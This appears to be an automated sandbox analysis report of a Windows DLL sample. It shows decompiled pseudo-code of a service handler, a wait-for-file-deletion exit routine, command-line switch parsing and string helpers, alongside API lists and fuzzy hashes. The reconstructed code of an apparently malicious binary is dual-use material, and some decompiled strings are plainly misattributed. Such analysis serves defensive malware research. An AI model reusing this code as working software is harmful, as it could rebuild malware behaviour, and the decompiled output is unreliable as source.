                                                                                                                        					case 0:
                                                                                                                        						 *0x6f340440 = 1;
                                                                                                                        						 *0x6f340448 = 0;
                                                                                                                        						 *0x6f340450 = 0;
                                                                                                                        						 *0x6f340454 = 0;
                                                                                                                        						goto L10;
                                                                                                                        					case 1:
                                                                                                                        						 *0x6f340440 = 7;
                                                                                                                        						goto L10;
                                                                                                                        					case 2:
                                                                                                                        						 *0x6f340440 = 4;
                                                                                                                        						goto L10;
                                                                                                                        					case 3:
                                                                                                                        						if(_a8 == 5) {
                                                                                                                        							_t13 = _a12;
                                                                                                                        							_t20 = _t19 | 0xffffffff;
                                                                                                                        							if(_t13 != 0) {
                                                                                                                        								_t20 =  *(_t13 + 4);
                                                                                                                        							}
                                                                                                                        							_t15 = HeapAlloc(GetProcessHeap(), 8, 4);
                                                                                                                        							if(_t15 != 0) {
                                                                                                                        								 *_t15 = _t20;
                                                                                                                        								CloseHandle(CreateThread(0, 0, E6F333930, _t15, 0, 0));
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L10;
                                                                                                                        					case 4:
                                                                                                                        						goto L10;
                                                                                                                        				}
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004), ref: 6F333AAA
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333AB1
                                                                                                                        • CreateThread.KERNEL32 ref: 6F333ACB
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F333AD2
                                                                                                                        • SetServiceStatus.ADVAPI32(00000000,6F34043C), ref: 6F333B26
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocCloseCreateHandleProcessServiceStatusThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3654718518-0
                                                                                                                        • Opcode ID: aa1efb9f6c07cb329115d044f5e6efb0496722ea239d2bec41fa2f3847d00fd6
                                                                                                                        • Instruction ID: 29d6f13638d0993f3e0a8b13f1bf11f7bfa277bd62d3ba558cd9a01db6c5939e
                                                                                                                        • Opcode Fuzzy Hash: aa1efb9f6c07cb329115d044f5e6efb0496722ea239d2bec41fa2f3847d00fd6
                                                                                                                        • Instruction Fuzzy Hash: EC115EB2B046A4EBEB10EF60C91AB1537ACF722724F00850CF985CB2C1CB75E4698F16
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332D55() {
                                                                                                                        				struct HWND__* _t1;
                                                                                                                        				int _t3;
                                                                                                                        				void* _t7;
                                                                                                                        
                                                                                                                        				if(_t1 != 0) {
                                                                                                                        					_t3 = IsWindow(_t1);
                                                                                                                        					_t1 =  *0x6f340398; // 0x0
                                                                                                                        					if(_t3 != 0) {
                                                                                                                        						PostMessageA(_t1, 0x10, 0, 0);
                                                                                                                        						_t1 =  *0x6f340398; // 0x0
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t7 = 0;
                                                                                                                        				while(_t1 != 0 && IsWindow(_t1) != 0) {
                                                                                                                        					Sleep(0x3e8);
                                                                                                                        					_t7 = _t7 + 1;
                                                                                                                        					if(_t7 < 0xa) {
                                                                                                                        						_t1 =  *0x6f340398; // 0x0
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					break;
                                                                                                                        				}
                                                                                                                        				ExitProcess(0);
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ExitMessagePostProcessSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1225241566-0
                                                                                                                        • Opcode ID: 5ecc4f31d18012f8fa3adfb5de54ad6d1765e610e70a559fe1b8a5b8db3526fd
                                                                                                                        • Instruction ID: 681eb7bd4e2cc7ea85cb19955f47721dbf716eab7accb08b31090a93cd8af42a
                                                                                                                        • Opcode Fuzzy Hash: 5ecc4f31d18012f8fa3adfb5de54ad6d1765e610e70a559fe1b8a5b8db3526fd
                                                                                                                        • Instruction Fuzzy Hash: D7F0AE73F407A697EA50D7798D85F46779C974AB21F010514B954D7180C961F4114AB4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332340(intOrPtr* _a4) {
                                                                                                                        				intOrPtr* _t15;
                                                                                                                        
                                                                                                                        				Sleep(0xbb8);
                                                                                                                        				_t15 = _a4;
                                                                                                                        				if( *_t15 == 0 &&  *(_t15 + 0x38) != 0) {
                                                                                                                        					do {
                                                                                                                        						Sleep(0x7d0);
                                                                                                                        					} while (GetFileAttributesA( *(_t15 + 0x38)) != 0xffffffff);
                                                                                                                        					E6F331C00(_t15);
                                                                                                                        					VirtualFree( *(_t15 + 0x24), 0, 0x8000);
                                                                                                                        					 *(_t15 + 0x24) = 0;
                                                                                                                        					ExitProcess(0);
                                                                                                                        				}
                                                                                                                        				return 0;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 6F33234D
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6F33236A
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 6F332370
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F33238B
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33239A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$AttributesExitFileFreeProcessVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4254501734-0
                                                                                                                        • Opcode ID: e3055ee782c37a465b9567625543a0f5655fb139d49061dc21d7a3ddf729c738
                                                                                                                        • Instruction ID: 569a18e446c410d1e6072e679a0f8067d002a8a09c78fe39bb27979818edb659
                                                                                                                        • Opcode Fuzzy Hash: e3055ee782c37a465b9567625543a0f5655fb139d49061dc21d7a3ddf729c738
                                                                                                                        • Instruction Fuzzy Hash: 43F09A32900B54ABD760EB66CD84B46B3ACBF45B34F210A1DE2869A0C0C7B4F450CAA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33A230() {
                                                                                                                        				int _v4;
                                                                                                                        				char _v7;
                                                                                                                        				char _v8;
                                                                                                                        				intOrPtr* _t15;
                                                                                                                        				char _t18;
                                                                                                                        				int _t23;
                                                                                                                        				signed int _t29;
                                                                                                                        				void* _t32;
                                                                                                                        
                                                                                                                        				if(GetCommandLineA() == 0) {
                                                                                                                        					L20:
                                                                                                                        					ExitProcess(0);
                                                                                                                        				}
                                                                                                                        				_v4 = 0;
                                                                                                                        				_t32 = E6F33A3D0(_t12,  &_v4);
                                                                                                                        				if(_t32 == 0) {
                                                                                                                        					L19:
                                                                                                                        					goto L20;
                                                                                                                        				}
                                                                                                                        				_t23 = _v4;
                                                                                                                        				if(_t23 <= 2) {
                                                                                                                        					L18:
                                                                                                                        					LocalFree(_t32);
                                                                                                                        					goto L19;
                                                                                                                        				}
                                                                                                                        				_t29 = 2;
                                                                                                                        				if(_t23 <= 2) {
                                                                                                                        					L17:
                                                                                                                        					goto L18;
                                                                                                                        				}
                                                                                                                        				do {
                                                                                                                        					_t15 =  *((intOrPtr*)(_t32 + _t29 * 4));
                                                                                                                        					if( *((char*)(_t15 + 1)) != 0) {
                                                                                                                        						goto L10;
                                                                                                                        					}
                                                                                                                        					_v8 =  *_t15;
                                                                                                                        					_v7 = 0;
                                                                                                                        					CharLowerA( &_v8);
                                                                                                                        					_t18 = _v8;
                                                                                                                        					if(_t18 == 0x66) {
                                                                                                                        						E6F33A130(1);
                                                                                                                        						L15:
                                                                                                                        						L16:
                                                                                                                        						goto L17;
                                                                                                                        					}
                                                                                                                        					if(_t18 == 0x65) {
                                                                                                                        						E6F33A130(0);
                                                                                                                        						goto L15;
                                                                                                                        					}
                                                                                                                        					if(_t18 == 0x75) {
                                                                                                                        						E6F339BD0(1);
                                                                                                                        						goto L15;
                                                                                                                        					}
                                                                                                                        					_t23 = _v4;
                                                                                                                        					L10:
                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                        				} while (_t29 < _t23);
                                                                                                                        				goto L16;
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F33A233
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33A2DF
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • CharLowerA.USER32(?,?,?,?,?,?), ref: 6F33A29A
                                                                                                                        • LocalFree.KERNEL32(00000000,?), ref: 6F33A2D6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Local$AllocCharCommandExitFreeLineLowerProcesslstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4176052798-0
                                                                                                                        • Opcode ID: 45b02f9bcce8a1a4ee07437cb1ba249ed157c0e17c44d5675a529c353e9943aa
                                                                                                                        • Instruction ID: 62b543cad9f8bf822fa7c11b2b4b434f62112e2da109fba511b37d372d18994b
                                                                                                                        • Opcode Fuzzy Hash: 45b02f9bcce8a1a4ee07437cb1ba249ed157c0e17c44d5675a529c353e9943aa
                                                                                                                        • Instruction Fuzzy Hash: 6B11273BC4C3E89FDF00DAA88804B9A7BDE5F52315F00041AE09AC21C2C7A3A445A7A3
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F33A2F0(short* _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                        				intOrPtr* _t11;
                                                                                                                        				char* _t12;
                                                                                                                        				int _t13;
                                                                                                                        				int _t17;
                                                                                                                        				short* _t18;
                                                                                                                        
                                                                                                                        				_t18 = _a4;
                                                                                                                        				_t12 = 0;
                                                                                                                        				asm("sbb esi, esi");
                                                                                                                        				_t17 =  ~_a8 & 0x0000fde9;
                                                                                                                        				_t13 = WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, 0, 0, 0, 0);
                                                                                                                        				if(_t13 > 0) {
                                                                                                                        					_t3 = _t13 + 1; // 0x1
                                                                                                                        					_t12 = HeapAlloc(GetProcessHeap(), 8, _t3);
                                                                                                                        					WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, _t12, _t13, 0, 0);
                                                                                                                        					_t11 = _a12;
                                                                                                                        					if(_t11 != 0) {
                                                                                                                        						 *_t11 = _t13 - 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t12;
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A311
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A33E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1432973188-0
                                                                                                                        • Opcode ID: 513b045bd5d977dfe80e25a0a9e41211161571cc39ed78a84d69232520f86582
                                                                                                                        • Instruction ID: c69044fcc06c6c2d78e20d22f4d4effe7338ccd1a74ded6e4d271befcf7ba498
                                                                                                                        • Opcode Fuzzy Hash: 513b045bd5d977dfe80e25a0a9e41211161571cc39ed78a84d69232520f86582
                                                                                                                        • Instruction Fuzzy Hash: B5F04F7760462E7FEA108A6A8C84F67B7ADEB86BB5F100229FA24D31C0D660EC154671
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F33A360(char* _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                        				intOrPtr* _t12;
                                                                                                                        				short* _t13;
                                                                                                                        				int _t14;
                                                                                                                        				int _t18;
                                                                                                                        				char* _t19;
                                                                                                                        
                                                                                                                        				_t19 = _a4;
                                                                                                                        				_t13 = 0;
                                                                                                                        				asm("sbb esi, esi");
                                                                                                                        				_t18 =  ~_a8 & 0x0000fde9;
                                                                                                                        				_t14 = MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, 0, 0);
                                                                                                                        				if(_t14 > 0) {
                                                                                                                        					_t4 = _t14 + 2; // 0x2
                                                                                                                        					_t13 = HeapAlloc(GetProcessHeap(), 8, _t14 + _t4);
                                                                                                                        					MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, _t13, _t14);
                                                                                                                        					_t12 = _a12;
                                                                                                                        					if(_t12 != 0) {
                                                                                                                        						 *_t12 = _t14 - 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t13;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,74786900,6F3339D7,?,00000000,00000000), ref: 6F33A37F
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                        • MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1432973188-0
                                                                                                                        • Opcode ID: 293f44257d25c632d2d9eb448c8c451609da6b0a2be44b368f75e97f63aed275
                                                                                                                        • Instruction ID: 4af41991ab75589ae8fc3341def39c1de76c2ef6b34f59a69a079a8b4dbe007d
                                                                                                                        • Opcode Fuzzy Hash: 293f44257d25c632d2d9eb448c8c451609da6b0a2be44b368f75e97f63aed275
                                                                                                                        • Instruction Fuzzy Hash: 2EF09677600A2D7FEB108AA98C84E67B7EDEB86775F100229FA24D32C0D770EC154671
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Executed Functions

                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F338510(struct HINSTANCE__* _a4, intOrPtr _a8) {
                                                                                                                        				char _v268;
                                                                                                                        				char _v276;
                                                                                                                        				char _v284;
                                                                                                                        				char _v292;
                                                                                                                        				char _v524;
                                                                                                                        				char _v532;
                                                                                                                        				char _v540;
                                                                                                                        				char _v544;
                                                                                                                        				char _v548;
                                                                                                                        				char _v552;
                                                                                                                        				char _v556;
                                                                                                                        				char _v560;
                                                                                                                        				char _v568;
                                                                                                                        				char _v576;
                                                                                                                        				char _v584;
                                                                                                                        				int _v588;
                                                                                                                        				char _v592;
                                                                                                                        				intOrPtr _v596;
                                                                                                                        				intOrPtr _v600;
                                                                                                                        				int _v604;
                                                                                                                        				char* _v608;
                                                                                                                        				intOrPtr _v612;
                                                                                                                        				intOrPtr _v616;
                                                                                                                        				int _v620;
                                                                                                                        				char* _v624;
                                                                                                                        				intOrPtr _v628;
                                                                                                                        				intOrPtr _v632;
                                                                                                                        				int _v636;
                                                                                                                        				char* _v640;
                                                                                                                        				intOrPtr _v644;
                                                                                                                        				intOrPtr _v648;
                                                                                                                        				int _v652;
                                                                                                                        				char* _v656;
                                                                                                                        				intOrPtr _v660;
                                                                                                                        				intOrPtr _v664;
                                                                                                                        				int _v668;
                                                                                                                        				char* _v672;
                                                                                                                        				intOrPtr _v676;
                                                                                                                        				intOrPtr _v680;
                                                                                                                        				int _v684;
                                                                                                                        				char* _v688;
                                                                                                                        				intOrPtr _v692;
                                                                                                                        				intOrPtr _v696;
                                                                                                                        				int _v700;
                                                                                                                        				char* _v704;
                                                                                                                        				intOrPtr _v708;
                                                                                                                        				intOrPtr _v712;
                                                                                                                        				int _v716;
                                                                                                                        				char* _v720;
                                                                                                                        				intOrPtr _v724;
                                                                                                                        				intOrPtr _v728;
                                                                                                                        				int _v732;
                                                                                                                        				char* _v736;
                                                                                                                        				intOrPtr _v740;
                                                                                                                        				intOrPtr _v744;
                                                                                                                        				int _v748;
                                                                                                                        				char* _v752;
                                                                                                                        				intOrPtr _v756;
                                                                                                                        				intOrPtr _v760;
                                                                                                                        				int _v764;
                                                                                                                        				char* _v768;
                                                                                                                        				intOrPtr _v772;
                                                                                                                        				intOrPtr _v776;
                                                                                                                        				int _v780;
                                                                                                                        				char* _v784;
                                                                                                                        				intOrPtr _v788;
                                                                                                                        				intOrPtr _v792;
                                                                                                                        				int _v796;
                                                                                                                        				char* _v800;
                                                                                                                        				intOrPtr _v804;
                                                                                                                        				intOrPtr _v808;
                                                                                                                        				int _v812;
                                                                                                                        				char* _v816;
                                                                                                                        				intOrPtr _v820;
                                                                                                                        				intOrPtr _v824;
                                                                                                                        				int _v828;
                                                                                                                        				char* _v832;
                                                                                                                        				short _v836;
                                                                                                                        				intOrPtr _v840;
                                                                                                                        				long _v844;
                                                                                                                        				char* _v848;
                                                                                                                        				char _v852;
                                                                                                                        				long _v856;
                                                                                                                        				void _v860;
                                                                                                                        				char _v868;
                                                                                                                        				long _v872;
                                                                                                                        				intOrPtr _v888;
                                                                                                                        				int _v908;
                                                                                                                        				char* _v912;
                                                                                                                        				intOrPtr _v916;
                                                                                                                        				intOrPtr _v920;
                                                                                                                        				int _v924;
                                                                                                                        				char* _v928;
                                                                                                                        				void* _v932;
                                                                                                                        				char _v936;
                                                                                                                        				char _v937;
                                                                                                                        				char _v938;
                                                                                                                        				short _v939;
                                                                                                                        				void* _v940;
                                                                                                                        				char _v944;
                                                                                                                        				char _v945;
                                                                                                                        				short _v947;
                                                                                                                        				void* _v948;
                                                                                                                        				char _v952;
                                                                                                                        				void* _v956;
                                                                                                                        				char _v960;
                                                                                                                        				short _v962;
                                                                                                                        				short _v964;
                                                                                                                        				short _v966;
                                                                                                                        				char _v968;
                                                                                                                        				short _v970;
                                                                                                                        				char _v972;
                                                                                                                        				short _v974;
                                                                                                                        				short _v976;
                                                                                                                        				int _v980;
                                                                                                                        				signed int _v984;
                                                                                                                        				signed int _v992;
                                                                                                                        				intOrPtr _t262;
                                                                                                                        				void* _t263;
                                                                                                                        				void* _t264;
                                                                                                                        				void* _t265;
                                                                                                                        				void* _t266;
                                                                                                                        				void* _t267;
                                                                                                                        				void* _t268;
                                                                                                                        				void* _t269;
                                                                                                                        				void* _t270;
                                                                                                                        				void* _t271;
                                                                                                                        				void* _t272;
                                                                                                                        				void* _t273;
                                                                                                                        				void* _t274;
                                                                                                                        				void* _t275;
                                                                                                                        				struct HINSTANCE__* _t277;
                                                                                                                        				struct HINSTANCE__* _t278;
                                                                                                                        				struct HINSTANCE__* _t279;
                                                                                                                        				struct HINSTANCE__* _t280;
                                                                                                                        				struct HINSTANCE__* _t281;
                                                                                                                        				struct HINSTANCE__* _t282;
                                                                                                                        				struct HINSTANCE__* _t283;
                                                                                                                        				void* _t284;
                                                                                                                        				void* _t285;
                                                                                                                        				void* _t286;
                                                                                                                        				void* _t287;
                                                                                                                        				void* _t288;
                                                                                                                        				void* _t289;
                                                                                                                        				void* _t290;
                                                                                                                        				CHAR* _t343;
                                                                                                                        				CHAR* _t347;
                                                                                                                        				void* _t350;
                                                                                                                        				void* _t351;
                                                                                                                        				void* _t352;
                                                                                                                        				CHAR* _t355;
                                                                                                                        				void* _t357;
                                                                                                                        				CHAR* _t359;
                                                                                                                        				long _t360;
                                                                                                                        				char* _t362;
                                                                                                                        				void* _t363;
                                                                                                                        				intOrPtr _t365;
                                                                                                                        				char _t366;
                                                                                                                        				WCHAR* _t369;
                                                                                                                        				void* _t371;
                                                                                                                        				CHAR* _t373;
                                                                                                                        				intOrPtr _t375;
                                                                                                                        				CHAR* _t390;
                                                                                                                        				CHAR* _t400;
                                                                                                                        				void* _t403;
                                                                                                                        				signed int _t404;
                                                                                                                        				int _t407;
                                                                                                                        				char _t408;
                                                                                                                        				struct HINSTANCE__* _t410;
                                                                                                                        				intOrPtr _t413;
                                                                                                                        				void* _t415;
                                                                                                                        				struct HINSTANCE__* _t420;
                                                                                                                        				long _t423;
                                                                                                                        				void* _t424;
                                                                                                                        				struct HINSTANCE__* _t427;
                                                                                                                        				void* _t428;
                                                                                                                        				struct HINSTANCE__* _t431;
                                                                                                                        				void* _t432;
                                                                                                                        				char _t433;
                                                                                                                        				struct HINSTANCE__* _t435;
                                                                                                                        				void* _t436;
                                                                                                                        				char _t437;
                                                                                                                        				struct HINSTANCE__* _t439;
                                                                                                                        				void* _t441;
                                                                                                                        				struct HINSTANCE__* _t446;
                                                                                                                        				void* _t447;
                                                                                                                        				struct HINSTANCE__* _t450;
                                                                                                                        				intOrPtr _t451;
                                                                                                                        				intOrPtr _t463;
                                                                                                                        				char* _t464;
                                                                                                                        				struct HWND__* _t466;
                                                                                                                        				struct HWND__* _t468;
                                                                                                                        				char _t470;
                                                                                                                        				intOrPtr* _t476;
                                                                                                                        				char* _t477;
                                                                                                                        				int _t478;
                                                                                                                        				void* _t480;
                                                                                                                        				void* _t481;
                                                                                                                        				int _t483;
                                                                                                                        				short* _t484;
                                                                                                                        				long _t489;
                                                                                                                        				long _t493;
                                                                                                                        				char* _t502;
                                                                                                                        				int _t503;
                                                                                                                        				char* _t504;
                                                                                                                        				char _t505;
                                                                                                                        				WCHAR* _t507;
                                                                                                                        				void* _t509;
                                                                                                                        				CHAR* _t511;
                                                                                                                        				char _t512;
                                                                                                                        				char _t514;
                                                                                                                        				char _t515;
                                                                                                                        				char _t531;
                                                                                                                        				void* _t541;
                                                                                                                        				void* _t543;
                                                                                                                        				char* _t544;
                                                                                                                        				char* _t546;
                                                                                                                        				char _t548;
                                                                                                                        				void* _t549;
                                                                                                                        				CHAR* _t552;
                                                                                                                        				CHAR* _t553;
                                                                                                                        				char _t560;
                                                                                                                        				char _t561;
                                                                                                                        				intOrPtr _t568;
                                                                                                                        				intOrPtr _t575;
                                                                                                                        				void* _t576;
                                                                                                                        				void* _t589;
                                                                                                                        				signed int _t591;
                                                                                                                        				void* _t592;
                                                                                                                        				signed int _t596;
                                                                                                                        				void** _t598;
                                                                                                                        				intOrPtr* _t601;
                                                                                                                        				void* _t605;
                                                                                                                        				struct HINSTANCE__* _t606;
                                                                                                                        				void* _t611;
                                                                                                                        				void* _t613;
                                                                                                                        				void* _t618;
                                                                                                                        				void* _t621;
                                                                                                                        				void* _t622;
                                                                                                                        				void* _t623;
                                                                                                                        				void* _t624;
                                                                                                                        				void* _t625;
                                                                                                                        				void* _t626;
                                                                                                                        				void* _t627;
                                                                                                                        				void* _t628;
                                                                                                                        				void* _t632;
                                                                                                                        				void* _t633;
                                                                                                                        
                                                                                                                        				_t262 = _a8;
                                                                                                                        				if(_t262 == 0) {
                                                                                                                        					_t263 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        					__eflags = _t263;
                                                                                                                        					if(_t263 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t263);
                                                                                                                        					}
                                                                                                                        					_t264 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        					__eflags = _t264;
                                                                                                                        					if(_t264 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t264);
                                                                                                                        					}
                                                                                                                        					_t265 = M6F340520; // 0xa4df18
                                                                                                                        					__eflags = _t265;
                                                                                                                        					if(_t265 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t265);
                                                                                                                        					}
                                                                                                                        					_t266 = M6F340524; // 0xa56118
                                                                                                                        					__eflags = _t266;
                                                                                                                        					if(_t266 != 0) {
